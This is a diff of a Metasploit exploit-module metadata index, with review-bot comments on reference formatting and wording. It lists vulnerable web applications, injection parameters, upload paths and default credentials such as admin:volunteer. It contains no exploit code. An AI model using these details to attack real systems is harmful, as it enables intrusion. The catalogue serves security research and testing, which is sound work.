"description": "This module exploits a file upload vulnerability in Glossword\n versions 1.8.8 to 1.8.12 when run as a standalone application.\n This application has an upload feature that allows an authenticated user\n with administrator roles to upload arbitrary files to the 'gw_temp/a/'\n directory.",
"references": [
"CVE-2013-10067",
"EDB-24456",
"OSVDB-89960"
],
@@ -107047,7 +107897,7 @@
"targets": [
"Automatic Targeting"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/multi/http/glossword_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/glossword_upload_exec",
@@ -108809,6 +109659,7 @@
],
"description": "This module exploits a vulnerability in Kordil EDMS v2.2.60rc3.\n This application has an upload feature that allows an unauthenticated user\n to upload arbitrary files to the '/kordil_edms/userpictures/' directory.",
"references": [
"CVE-2013-10066",
"OSVDB-90645",
"EDB-24547"
],
@@ -108833,7 +109684,7 @@
"targets": [
"Automatic Targeting"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/multi/http/kordil_edms_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/kordil_edms_upload_exec",
@@ -109035,6 +109886,66 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_multi/http/lighthouse_studio_unauth_rce_cve_2025_34300": {
"name": "Template Injection Vulnerability in Sawtooth Software's Lighthouse Studio (CVE-2025-34300)",
"fullname": "exploit/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300",
"aliases": [],
"rank": 600,
"disclosure_date": "2025-07-16",
"type": "exploit",
"author": [
"Maksim Rogov",
"Adam Kues"
],
"description": "This module exploits a template injection vulnerability in the\n Sawtooth Software Lighthouse Studio's `ciwweb.pl` web application.\n The application fails to properly sanitize user input within survey templates,\n allowing unauthenticated attackers to inject and execute arbitrary Perl commands\n on the target system.\n\n This vulnerability affects Lighthouse Studio versions prior to 9.16.14.\n Successful exploitation may result in remote code execution under the privileges\n of the web server, potentially exposing sensitive data or disrupting survey operations.\n\n An attacker can execute arbitrary system commands in the context of the user running the web server.",
"references": [
"CVE-2025-34300",
"URL-https://slcyber.io/assetnote-security-research-center/rce-in-the-most-popular-survey-software-youve-never-heard-of/"
],
"platform": "Multi",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Unix Command",
"Windows Command"
],
"mod_time": "2025-07-26 03:15:00 +0000",
"path": "/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb",
"is_install_path": true,
"ref_name": "multi/http/lighthouse_studio_unauth_rce_cve_2025_34300",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs",
"artifacts-on-disk"
],
"Reliability": [
"repeatable-session"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_multi/http/log1cms_ajax_create_folder": {
"name": "Log1 CMS writeInfo() PHP Code Injection",
"fullname": "exploit/multi/http/log1cms_ajax_create_folder",
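Review bot: the description of exploit_multi/http/lighthouse_studio_unauth_rce_cve_2025_34300 states the impact twice; "Successful exploitation may result in remote code execution under the privileges of the web server" and the closing "An attacker can execute arbitrary system commands in the context of the user running the web server" say the same thing. Keep one of them so the module text stays concise, and note that the module's own Ruby source is where the fix belongs, since this JSON is regenerated from it.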
@@ -109177,6 +110088,7 @@
],
"description": "This module can be used to execute a payload on Lucee servers that have an exposed\n administrative web interface. It's possible for an administrator to create a\n scheduled job that queries a remote ColdFusion file, which is then downloaded and executed\n when accessed. The payload is uploaded as a cfm file when queried by the target server. When executed,\n the payload will run as the user specified during the Lucee installation. On Windows, this is a service account;\n on Linux, it is either the root user or lucee.",
"references": [
"CVE-2025-34074",
"URL-https://docs.lucee.org/",
"URL-https://docs.lucee.org/reference/tags/execute.html",
"URL-https://docs.lucee.org/reference/tags/script.html"
@@ -109203,7 +110115,7 @@
"Windows Command",
"Unix Command"
],
"mod_time": "2023-02-28 17:28:48 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/multi/http/lucee_scheduled_job.rb",
"is_install_path": true,
"ref_name": "multi/http/lucee_scheduled_job",
@@ -109300,6 +110212,7 @@
],
"description": "This module exploits a vulnerability found in Mako Server v2.5, 2.6.\n It's possible to inject arbitrary OS commands in the Mako Server\n tutorial page through a PUT request to save.lsp.\n\n Attacker input will be saved on the victims machine and can\n be executed by sending a GET request to manage.lsp.",
"references": [
"CVE-2025-34095",
"EDB-42683",
"URL-https://blogs.securiteam.com/index.php/archives/3391"
],
@@ -109324,7 +110237,7 @@
"targets": [
"Mako Server v2.5, 2.6"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/multi/http/makoserver_cmd_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/makoserver_cmd_exec",
@@ -109547,6 +110460,7 @@
],
"description": "This module exploits a file upload vulnerability in ManageEngine ServiceDesk Plus.\n The vulnerability exists in the FileUploader servlet which accepts unauthenticated\n file uploads. This module has been tested successfully on versions v9 b9000 - b9102\n in Windows and Linux. The MSP versions do not expose the vulnerable servlet.",
"references": [
"CVE-2019-8394",
"ZDI-15-396 ",
"URL-https://github.com/rapid7/metasploit-framework/pull/6038"
],
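Review bot: the reference "ZDI-15-396 " in this hunk carries a trailing space, which will not match the ZDI identifier when the reference is rendered or looked up; the CVE-2019-8394 line added here is clean, so trim the whitespace in the module's references array in the same change.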
@@ -109571,7 +110485,7 @@
"targets": [
"ServiceDesk Plus v9 b9000 - b9102 / Java Universal"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/multi/http/manageengine_sd_uploader.rb",
"is_install_path": true,
"ref_name": "multi/http/manageengine_sd_uploader",
@@ -110389,6 +111303,7 @@
],
"description": "This module exploits a vulnerability in MobileCartly. The savepage.php file\n does not do any permission checks before using file_put_contents(), which\n allows any user to have direct control of that function to create files\n under the 'pages' directory by default, or anywhere else as long as the user\n has WRITE permission.",
"references": [
"CVE-2012-10044",
"OSVDB-85509",
"EDB-20422 ",
"BID-55399 "
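Review bot: both "EDB-20422 " and "BID-55399 " in the mobilecartly_upload_exec references carry trailing spaces; since this hunk already touches the references array to add CVE-2012-10044, trim them in the module source so the generated identifiers match their databases exactly.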
@@ -110415,7 +111330,7 @@
"Generic (PHP Payload)",
"Linux x86"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/multi/http/mobilecartly_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/mobilecartly_upload_exec",
@@ -111122,6 +112037,7 @@
],
"description": "This module exploits a vulnerability found in Netwin SurgeFTP, version 23c8\n or prior. In order to execute commands via the FTP service, please note that\n you must have a valid credential to the web-based administrative console.",
"references": [
"CVE-2012-10028",
"OSVDB-89105",
"EDB-23522"
],
@@ -111148,7 +112064,7 @@
"Windows",
"Unix"
],
"mod_time": "2025-06-23 09:30:35 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/multi/http/netwin_surgeftp_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/netwin_surgeftp_exec",
@@ -112339,6 +113255,7 @@
],
"description": "If the /install/ directory was not removed, it is possible for an unauthenticated\n attacker to run the \"install_4.php\" script, which will create the configuration\n file for the installation. This allows the attacker to inject PHP code into the\n configuration file and execute it.",
"references": [
"CVE-2018-25114",
"EDB-44374"
],
"platform": "PHP",
@@ -112362,7 +113279,7 @@
"targets": [
"osCommerce 2.3.4.1"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/multi/http/oscommerce_installer_unauth_code_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/oscommerce_installer_unauth_code_exec",
@@ -112952,6 +113869,7 @@
],
"description": "This module exploits a vulnerability found in PHP Volunteer Management System,\n version v1.0.2 or prior. This application has an upload feature that allows an\n authenticated user to upload anything to the 'uploads' directory, which is actually\n reachable by anyone without a credential. An attacker can easily abuse this upload\n functionality first by logging in with the default credential (admin:volunteer),\n upload a malicious payload, and then execute it by sending another GET request.",
"references": [
"CVE-2012-10056",
"OSVDB-82391",
"EDB-18941"
],
@@ -112976,7 +113894,7 @@
"targets": [
"PHP Volunteer Management 1.0.2"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/multi/http/php_volunteer_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/php_volunteer_upload_exec",
@@ -113558,6 +114476,7 @@
],
"description": "This module can detect and exploit the backdoor of PHPStudy.",
"references": [
"CVE-2025-34061",
"URL-https://programmer.group/using-ghidra-to-analyze-the-back-door-of-phpstudy.html"
],
"platform": "PHP",
@@ -113581,7 +114500,7 @@
"targets": [
"PHPStudy 2016-2018"
],
"mod_time": "2024-07-24 16:42:43 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/multi/http/phpstudy_backdoor_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/phpstudy_backdoor_rce",
@@ -113615,6 +114534,7 @@
],
"description": "This module exploits a vulnerability found in PhpTax, an income tax report\n generator. When generating a PDF, the icondrawpng() function in drawimage.php\n does not properly handle the pfilez parameter, which will be used in an exec()\n statement, and then results in arbitrary remote code execution under the context\n of the web server. Please note: authentication is not required to exploit this\n vulnerability.",
"references": [
"CVE-2012-10037",
"OSVDB-86992",
"EDB-21665"
],
@@ -113639,7 +114559,7 @@
"targets": [
"PhpTax 0.8"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/multi/http/phptax_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/phptax_exec",
@@ -114212,6 +115132,7 @@
],
"description": "This module exploits a PHP code execution vulnerability in the\n 'neoclassic' skin for ProcessMaker Open Source which allows any\n authenticated user to execute PHP code. The vulnerable skin is\n installed by default in version 2.x and cannot be removed via\n the web interface.",
"references": [
"CVE-2013-10035",
"OSVDB-99199",
"BID-63411",
"URL-http://bugs.processmaker.com/view.php?id=13436"
@@ -114237,7 +115158,7 @@
"targets": [
"ProcessMaker Open Source 2.x (PHP Payload)"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/multi/http/processmaker_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/processmaker_exec",
@@ -114270,6 +115191,7 @@
],
"description": "This module will generate and upload a plugin to ProcessMaker\n resulting in execution of PHP code as the web server user.\n\n Credentials for a valid user account with Administrator roles\n is required to run this module.\n\n This module has been tested successfully on ProcessMaker versions\n 1.6-4276, 2.0.23, 3.0 RC 1, 3.2.0, 3.2.1 on Windows 7 SP 1;\n and version 3.2.0 on Debian Linux 8.",
"references": [
"CVE-2025-34097",
"URL-http://wiki.processmaker.com/3.0/Plugin_Development"
],
"platform": "PHP",
@@ -114293,7 +115215,7 @@
"targets": [
"Automatic Targeting"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/multi/http/processmaker_plugin_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/processmaker_plugin_upload",
@@ -114390,6 +115312,7 @@
],
"description": "This module exploits a vulnerability found in qdPM - a web-based project management\n software. The user profile's photo upload feature can be abused to upload any\n arbitrary file onto the victim server machine, which allows remote code execution.\n Please note in order to use this module, you must have a valid credential to sign\n in.",
"references": [
"CVE-2015-3884",
"OSVDB-82978",
"EDB-19154"
],
@@ -114415,7 +115338,7 @@
"Generic (PHP Payload)",
"Linux x86"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/multi/http/qdpm_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/qdpm_upload_exec",
@@ -115049,6 +115972,7 @@
],
"description": "This module exploits multiple design flaws in Sflog 1.0. By default, the CMS has\n a default admin credential of \"admin:secret\", which can be abused to access\n administrative features such as blogs management. Through the management\n interface, we can upload a backdoor that's accessible by any remote user, and then\n gain arbitrary code execution.",
"references": [
"CVE-2012-10042",
"OSVDB-83767",
"EDB-19626"
],
@@ -115074,7 +115998,7 @@
"Generic (PHP Payload)",
"Linux x86"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/multi/http/sflog_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/sflog_upload_exec",
@@ -115344,6 +116268,7 @@
],
"description": "This module exploits an arbitrary command execution vulnerability in\n nmap.php and nbtscan.php scripts.",
"references": [
"CVE-2011-10017",
"OSVDB-67739",
"URL-http://www.symmetrixtech.com/articles/news-016.html"
],
@@ -115368,7 +116293,7 @@
"targets": [
"Automatic"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/multi/http/snortreport_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/snortreport_exec",
@@ -115786,6 +116711,7 @@
],
"description": "This module exploits a PHP code injection vulnerability in SPIP. The vulnerability exists\n in the connect parameter, allowing an unauthenticated user to execute arbitrary commands\n with web user privileges. Branches 2.0, 2.1, and 3 are affected. Vulnerable versions are\n < 2.0.21, < 2.1.16, and < 3.0.3. This module is compatible with both Unix/Linux and Windows\n platforms, and has been successfully tested on SPIP 2.0.11 and SPIP 2.0.20 on Apache running\n on Ubuntu, Fedora, and Windows Server.",
"references": [
"CVE-2013-4557",
"OSVDB-83543",
"BID-54292",
"URL-http://contrib.spip.net/SPIP-3-0-3-2-1-16-et-2-0-21-a-l-etape-303-epate-la"
@@ -115813,7 +116739,7 @@
"Unix/Linux Command Shell",
"Windows Command Shell"
],
"mod_time": "2025-05-09 16:09:15 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/multi/http/spip_connect_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/spip_connect_exec",
@@ -116162,6 +117088,7 @@
],
"description": "This module exploits an arbitrary command execution vulnerability in the\n Spreecommerce search. Unvalidated input is called via the\n Ruby send method allowing command execution.",
"references": [
"CVE-2011-10019",
"OSVDB-76011",
"URL-http://spreecommerce.com/blog/2011/10/05/remote-command-product-group/"
],
@@ -116186,7 +117113,7 @@
"targets": [
"Automatic"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/multi/http/spree_search_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/spree_search_exec",
@@ -116219,6 +117146,7 @@
],
"description": "This module exploits an arbitrary command execution vulnerability in\n the Spreecommerce API searchlogic for versions 0.50.0 and earlier.\n Unvalidated input is called via the Ruby send method allowing command\n execution.",
"references": [
"CVE-2011-10026",
"OSVDB-71900",
"URL-http://www.spreecommerce.com/blog/2011/04/19/security-fixes/"
],
@@ -116243,7 +117171,7 @@
"targets": [
"Automatic"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/multi/http/spree_searchlogic_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/spree_searchlogic_exec",
@@ -118159,6 +119087,7 @@
],
"description": "This module exploits an arbitrary command execution vulnerability in\n Traq 2.0 to 2.3. It's in the admincp/common.php script.\n\n This function is called in each script located in the /admicp/ directory to\n make sure the user has admin rights. This is a broken authorization schema\n because the header() function doesn't stop the execution flow.\n This can be exploited by malicious users to execute admin functionality,\n e.g. execution of arbitrary PHP code leveraging of plugins.php functionality.",
"references": [
"CVE-2011-10013",
"OSVDB-77556",
"EDB-18213",
"URL-http://traqproject.org/"
@@ -118184,7 +119113,7 @@
"targets": [
"Automatic"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/multi/http/traq_plugin_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/traq_plugin_exec",
@@ -118342,6 +119271,7 @@
],
"description": "This module exploits an arbitrary file upload vulnerability found within the Up.Time\n monitoring server 7.2 and below. A malicious entity can upload a PHP file into the\n webroot without authentication, leading to arbitrary code execution.\n\n Although the vendor fixed Up.Time to prevent this vulnerability, it was not properly\n mitigated. To exploit against a newer version of Up.Time (such as 7.4), please use\n exploits/multi/http/uptime_file_upload_2.",
"references": [
"CVE-2025-34121",
"OSVDB-100423",
"BID-64031",
"URL-http://www.security-assessment.com/files/documents/advisory/Up.Time%207.2%20-%20Arbitrary%20File%20Upload.pdf"
@@ -118367,7 +119297,7 @@
"targets": [
"Up.Time 7.0/7.2"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/multi/http/uptime_file_upload_1.rb",
"is_install_path": true,
"ref_name": "multi/http/uptime_file_upload_1",
@@ -118402,6 +119332,7 @@
],
"description": "This module exploits a vulnerability found in Uptime version 7.4.0 and 7.5.0.\n\n The vulnerability began as a classic arbitrary file upload vulnerability in post2file.php,\n which can be exploited by exploits/multi/http/uptime_file_upload_1.rb, but it was mitigated\n by the vendor.\n\n Although the mitigation in place will prevent uptime_file_upload_1.rb from working, it\n can still be bypassed and gain privilege escalation, and allows the attacker to upload file\n again, and execute arbitrary commands.",
"references": [
"CVE-2015-9263 ",
"EDB-37888",
"URL-http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5254.php"
],
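Review bot: "CVE-2015-9263 " in the uptime_file_upload_2 references has a trailing space, so it will not match the CVE identifier as written; the reference should read "CVE-2015-9263" with the whitespace removed at the source.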
@@ -118426,7 +119357,7 @@
"targets": [
"Automatic"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/multi/http/uptime_file_upload_2.rb",
"is_install_path": true,
"ref_name": "multi/http/uptime_file_upload_2",
@@ -119307,6 +120238,65 @@
"session_types": false,
"needs_cleanup": true
},
"exploit_multi/http/vvveb_auth_rce_cve_2025_8518": {
"name": "Remote Code Execution Vulnerability in Vvveb",
"fullname": "exploit/multi/http/vvveb_auth_rce_cve_2025_8518",
"aliases": [],
"rank": 600,
"disclosure_date": "2025-01-10",
"type": "exploit",
"author": [
"Maksim Rogov",
"Hamed Kohi"
],
"description": "Vvveb CMS is vulnerable to code injection via the Code Editor functionality.\n\n Unsanitized editing functionality allows attacker-controlled changes to existing files on the web-accessible filesystem,\n allowing remote authenticated attackers with access to the Code Editor to achieve code execution\n when those modified files are executed or served by the application or web server.\n\n This vulnerability affects Vvveb CMS versions up to and including 1.0.5.\n Successful exploitation may result in the remote code execution under the privileges\n of the web server, potentially exposing sensitive data or disrupting survey operations.\n\n An attacker can execute arbitrary system commands in the context of the user running the web server.",
"references": [
"CVE-2025-8518",
"URL-https://hkohi.ca/vulnerability/8"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"PHP"
],
"mod_time": "2025-10-21 19:10:16 +0000",
"path": "/modules/exploits/multi/http/vvveb_auth_rce_cve_2025_8518.rb",
"is_install_path": true,
"ref_name": "multi/http/vvveb_auth_rce_cve_2025_8518",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs",
"artifacts-on-disk"
],
"Reliability": [
"repeatable-session"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_multi/http/weblogic_admin_handle_rce": {
"name": "Oracle WebLogic Server Administration Console Handle RCE",
"fullname": "exploit/multi/http/weblogic_admin_handle_rce",
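Review bot: the description of exploit_multi/http/vvveb_auth_rce_cve_2025_8518 ends with "potentially exposing sensitive data or disrupting survey operations", which is copied from the Lighthouse Studio survey-software module above; Vvveb is described in the same text as a CMS, so "survey operations" is wrong here and should be reworded. The same paragraph also reads "may result in the remote code execution", where "the" should be dropped, and the final sentence repeats the impact already stated.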
@@ -119448,6 +120438,7 @@
],
"description": "This module exploits a vulnerability found in WebPageTest's Upload Feature. By\n default, the resultimage.php file does not verify the user-supplied item before\n saving it to disk, and then places this item in the web directory accessible by\n remote users. This flaw can be abused to gain remote code execution.",
"references": [
"CVE-2012-10049",
"OSVDB-83822",
"EDB-19790"
],
@@ -119472,7 +120463,7 @@
"targets": [
"WebPageTest v2.6 or older"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/multi/http/webpagetest_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/webpagetest_upload_exec",
@@ -119506,6 +120497,7 @@
],
"description": "This module will exploit the Werkzeug debug console to put down a Python shell. Werkzeug is included with Flask, but not enabled by default. It is also included in other projects, for example the RunServerPlus extension for Django. It may also be used alone.\n\n The documentation states the following: \"The debugger must never be used on production machines. We cannot stress this enough. Do not enable the debugger in production.\" Of course this doesn't prevent developers from mistakenly enabling it in production!\n\n Tested against the following Werkzeug versions:\n - 3.0.3 on Debian 12, Windows 11 and macOS 14.6\n - 1.1.4 on Debian 12\n - 1.0.1 on Debian 12\n - 0.11.5 on Debian 12\n - 0.10 on Debian 12",
"references": [
"CVE-2024-34069",
"URL-https://werkzeug.palletsprojects.com/debug/#enabling-the-debugger",
"URL-https://flask.palletsprojects.com/debugging/#the-built-in-debugger",
"URL-https://web.archive.org/web/20150217044248/http://werkzeug.pocoo.org/docs/0.10/debug/#enabling-the-debugger",
@@ -119536,7 +120528,7 @@
"Werkzeug 0.11 - 0.11.5 (Flask < 1.0)",
"Werkzeug < 0.11 (Flask < 1.0)"
],
"mod_time": "2024-12-08 21:01:17 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/multi/http/werkzeug_debug_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/werkzeug_debug_rce",
@@ -119750,6 +120742,7 @@
],
"description": "The AIT CSV Import/Export plugin <= 3.0.3 allows unauthenticated remote attackers to upload and\n execute arbitrary PHP code. The upload-handler does not require authentication, nor validates\n the uploaded content. It may return an error when attempting to parse a CSV, however the\n uploaded shell is left. The shell is uploaded to wp-content/uploads/. The plugin is not\n required to be activated to be exploitable.",
"references": [
"CVE-2020-36849",
"URL-https://www.ait-themes.club/wordpress-plugins/csv-import-export/#changelog-popup",
"WPVDB-10471"
],
@@ -119774,7 +120767,7 @@
"targets": [
"AIT CSV Import Export <3.0.4"
],
"mod_time": "2023-02-10 18:04:31 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/multi/http/wp_ait_csv_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/wp_ait_csv_rce",
@@ -120122,6 +121115,7 @@
],
"description": "There exists a command injection vulnerability in the Wordpress plugin\n `wp-database-backup` for versions < 5.2.\n\n For the backup functionality, the plugin generates a `mysqldump` command\n to execute. The user can choose specific tables to exclude from the backup\n by setting the `wp_db_exclude_table` parameter in a POST request to the\n `wp-database-backup` page. The names of the excluded tables are included in\n the `mysqldump` command unsanitized. Arbitrary commands injected through the\n `wp_db_exclude_table` parameter are executed each time the functionality\n for creating a new database backup are run.\n\n Authentication is required to successfully exploit this vulnerability.",
"references": [
"CVE-2019-25224",
"URL-https://www.wordfence.com/blog/2019/05/os-command-injection-vulnerability-patched-in-wp-database-backup-plugin/"
],
"platform": "Linux,Windows",
@@ -120146,7 +121140,7 @@
"Windows",
"Linux"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/multi/http/wp_db_backup_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/wp_db_backup_rce",
@@ -121102,7 +122096,8 @@
],
"description": "Simple File List (simple-file-list) plugin before 4.2.3 for WordPress allows remote unauthenticated attackers\n to upload files within a controlled list of extensions. However, the rename function does not conform to\n the file extension restrictions, thus allowing arbitrary PHP code to be uploaded first as a png then renamed\n to php and executed.",
"references": [
"URL-https://wpscan.com/vulnerability/10192",
"CVE-2020-36847",
"WPVDB-10192",
"URL-https://www.cybersecurity-help.cz/vdb/SB2020042711",
"URL-https://plugins.trac.wordpress.org/changeset/2286920/simple-file-list",
"EDB-48349"
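Review bot: the wp_simple_file_list_rce references now list both "URL-https://wpscan.com/vulnerability/10192" and "WPVDB-10192", which point at the same advisory; since this hunk is already adding CVE-2020-36847 to the array, drop the raw URL and keep the WPVDB identifier, which is the framework's canonical form for that source.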
@@ -121128,7 +122123,7 @@
"targets": [
"Default"
],
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2025-10-07 14:03:32 +0000",
"path": "/modules/exploits/multi/http/wp_simple_file_list_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/wp_simple_file_list_rce",
@@ -121913,6 +122908,7 @@
],
"description": "This module exploits an information disclosure vulnerability\n in ZPanel. The vulnerability is due to a vulnerable version\n of pChart used by ZPanel that allows unauthenticated users to read\n arbitrary files remotely on the file system. This particular module\n utilizes this vulnerability to identify the username/password\n combination of the MySQL instance. With the\n credentials the attackers can login to PHPMyAdmin and execute\n SQL commands to drop a malicious payload on the filesystem and\n call it leading to remote code execution.",
"references": [
"CVE-2013-2097",
"EDB-31173",
"OSVDB-102595",
"URL-http://blog.0xlabs.com/2014/03/zpanel-10.1.x-remote-root.html",
@@ -121940,7 +122936,7 @@
"Generic (PHP Payload)",
"Linux x86"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/zpanel_information_disclosure_rce",
@@ -122231,113 +123227,6 @@
"needs_cleanup": true,
"actions": []
},
"exploit_multi/local/obsidian_plugin_persistence": {
"name": "Obsidian Plugin Persistence",
"fullname": "exploit/multi/local/obsidian_plugin_persistence",
"aliases": [],
"rank": 600,
"disclosure_date": "2022-09-16",
"type": "exploit",
"author": [
"h00die",
"Thomas Byrne"
],
"description": "This module searches for Obsidian vaults for a user, and uploads a malicious\n community plugin to the vault. The vaults must be opened with community\n plugins enabled (NOT restricted mode), but the plugin will be enabled\n automatically.\n\n Tested against Obsidian 1.7.7 on Kali, Ubuntu 22.04, and Windows 10.",
"references": [
"URL-https://docs.obsidian.md/Plugins/Getting+started/Build+a+plugin",
"URL-https://github.com/obsidianmd/obsidian-sample-plugin/tree/master",
"URL-https://forum.obsidian.md/t/can-obsidian-plugins-have-malware/34491",
"URL-https://help.obsidian.md/Extending+Obsidian/Plugin+security",
"URL-https://thomas-byrne.co.uk/research/obsidian-malicious-plugins/obsidian-research/"
],
"platform": "Linux,OSX,Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": [
"Auto",
"Linux",
"OSX",
"Windows"
],
"mod_time": "2024-12-14 17:38:29 +0000",
"path": "/modules/exploits/multi/local/obsidian_plugin_persistence.rb",
"is_install_path": true,
"ref_name": "multi/local/obsidian_plugin_persistence",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Reliability": [
"repeatable-session"
],
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk",
"config-changes"
]
},
"session_types": [
"shell",
"meterpreter"
],
"needs_cleanup": null,
"actions": []
},
"exploit_multi/local/periodic_script_persistence": {
"name": "Periodic Script Persistence",
"fullname": "exploit/multi/local/periodic_script_persistence",
"aliases": [],
"rank": 600,
"disclosure_date": "2012-04-01",
"type": "exploit",
"author": [
"gardnerapp",
"msutovsky-r7"
],
"description": "This module will achieve persistence by writing a script to the /etc/periodic directory.\n According to The Art of Mac Malware no such malware species persist in this manner (2024).\n This payload requires root privileges to run. This module can be run on BSD, OSX or Arch Linux.",
"references": [],
"platform": "BSD,OSX,Unix",
"arch": "",
"rport": null,
"autofilter_ports": [],
"autofilter_services": [],
"targets": [
"OSX",
"Python",
"Unix",
"Bsd"
],
"mod_time": "2025-08-29 17:53:07 +0000",
"path": "/modules/exploits/multi/local/periodic_script_persistence.rb",
"is_install_path": true,
"ref_name": "multi/local/periodic_script_persistence",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session",
"event-dependent"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
]
},
"session_types": [
"shell",
"meterpreter"
],
"needs_cleanup": null,
"actions": []
},
"exploit_multi/local/vagrant_synced_folder_vagrantfile_breakout": {
"name": "Vagrant Synced Folder Vagrantfile Breakout",
"fullname": "exploit/multi/local/vagrant_synced_folder_vagrantfile_breakout",
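Review bot: this hunk removes the exploit_multi/local/obsidian_plugin_persistence and exploit_multi/local/periodic_script_persistence entries without a replacement in the same hunk; if these modules were moved under the persistence mixin, confirm the new entries carry the old ref_names in "aliases" (as exploit_multi/persistence/at does with "exploits/unix/local/at_persistence") so existing resource scripts and documentation that reference the old paths keep resolving.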
@@ -123046,6 +123935,7 @@
],
"description": "The erlang port mapper daemon is used to coordinate distributed erlang instances.\n Should an attacker get the authentication cookie RCE is trivial. Usually, this\n cookie is named \".erlang.cookie\" and varies on location.",
"references": [
"CVE-2020-24719",
"URL-https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/"
],
"platform": "",
@@ -123059,7 +123949,7 @@
"Windows",
"Windows (CmdStager)"
],
